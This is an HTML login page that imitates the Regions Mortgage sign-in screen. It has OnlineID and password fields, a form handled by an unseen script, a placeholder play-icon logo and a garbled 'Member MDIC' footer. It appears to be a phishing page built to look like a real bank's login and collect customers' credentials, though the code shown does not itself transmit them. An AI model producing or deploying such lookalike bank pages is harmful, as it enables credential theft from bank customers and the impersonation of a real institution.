<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Regions Mortgage : Login</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link
        href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap"
        rel="stylesheet">


    <link rel="stylesheet" href="index.css">
</head>

<body>

    <div class="root">

        <div class="container">
            <div class="left__col">
                <div class="top__text">

                    <div class="logo">

                        <svg class="logo__icon" xmlns="http://www.w3.org/2000/svg"
                            viewBox="0 0 384 512"><!--!Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free Copyright 2024 Fonticons, Inc.-->
                            <path
                                d="M73 39c-14.8-9.1-33.4-9.4-48.5-.9S0 62.6 0 80L0 432c0 17.4 9.4 33.4 24.5 41.9s33.7 8.1 48.5-.9L361 297c14.3-8.7 23-24.2 23-41s-8.7-32.2-23-41L73 39z" />
                        </svg>
                        <p class="logo__text">
                            REGIONS
                            <span>Mortgage</span>
                        </p>
                    </div>

                    <div class="logo__sidetext">
                        <p>
                            Are you a new customer?
                        </p>

                        <button>
                            Enroll Now
                        </button>
                    </div>



                </div>

                <div class="form__container">
                    <h3 class="form__heading">
                        Welcome Back
                    </h3>

                    <p class="form__subheading">
                        Sign in to your regions MyMortgage Account
                    </p>
                    <form id="form">
                        <input type="text" placeholder="OnlineID" name="onlineId" id="onlineId" />

                        <input type="password" placeholder="password" name="password" id="password" />

                        <div>
                            <input type="checkbox" name="remember" id="remember" />
                            <label for="remember">
                                Remember Me ?
                            </label>
                        </div>

                        <button type="submit" value="Submit" class="submit">
                           <span 
                           id="buttonText"
                           > 
                            Submit

                           </span>
                        <span
                        class="loading__spinner"
                        >
                            <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 24 24"><path fill="currentColor" d="M12,1A11,11,0,1,0,23,12,11,11,0,0,0,12,1Zm0,19a8,8,0,1,1,8-8A8,8,0,0,1,12,20Z" opacity="0.25"/><path fill="currentColor" d="M12,4a8,8,0,0,1,7.89,6.7A1.53,1.53,0,0,0,21.38,12h0a1.5,1.5,0,0,0,1.48-1.75,11,11,0,0,0-21.72,0A1.5,1.5,0,0,0,2.62,12h0a1.53,1.53,0,0,0,1.49-1.3A8,8,0,0,1,12,4Z"><animateTransform attributeName="transform" dur="0.75s" repeatCount="indefinite" type="rotate" values="0 12 12;360 12 12"/></path></svg>
                        </span>
                        </button>

                    </form>

                </div>

                <div class="footer__container">

                    <p>Equal Housing Leader. Member MDIC</p>


                </div>

            </div>

            <div class="img__container">
                <img src="/assets/background.jpg" />
            </div>

        </div>

    </div>
    <script src="index.js"></script>
</body>

</html>